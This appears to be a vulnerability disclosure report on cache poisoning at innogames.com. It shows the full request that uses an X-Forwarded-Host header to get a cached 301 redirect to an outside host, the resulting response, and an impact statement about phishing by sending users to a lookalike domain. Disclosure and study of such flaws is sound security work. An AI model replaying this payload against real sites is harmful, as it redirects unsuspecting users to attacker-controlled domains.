Cache poisoning vulnerability appears in the request to innogames.com. The issue arises when language path parameter from the url gets processed on the backend to become lowercase. Then if a path provided in X-Forwarded-Host does not exist on the server, 301 response is triggered with a redirect. The url provided in X-Forwarded-Host header gets cached and every user accessing this path will be redirected to it.
https://innogames.com/DE/?variable=value
>Host: www.innogames.com
>Port: 443
>Check: Use HTTPS
Request body:
GET /DE/?mace=triage HTTP/1.1
Host: www.innogames.com
Accept-Language: en,en-US;q=0.7,en;q=0.3
X-Forwarded-Host: not-evil.burpcollaborator.net
Response:
HTTP/1.1 301 Moved Permanently
Location: https://not-evil.burpcollaborator.net/de/?mace=triage
Content-Type: text/html; charset=UTF-8
X-Served-By: cache-fra19153-FRA, cache-ams21024-AMS
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1597672892.323454,VS0,VE16
Vary: Accept-Language,X-UA-Device
[...]
#Impact statement
This could be used for the phishing attacks. An attacker can set up a Domain which looks similar to innogames.com and spread this poisoned link via facebook or other forums, fooling users to follow it and get redirected to the evil attackers domain. However, one of the requirements for the exploitability is that an attacker has to be on a location near (from a network view) the target user. Otherwise his poisoned request will not hit the same fastly server as the users request.
#References
Security advisories from fastly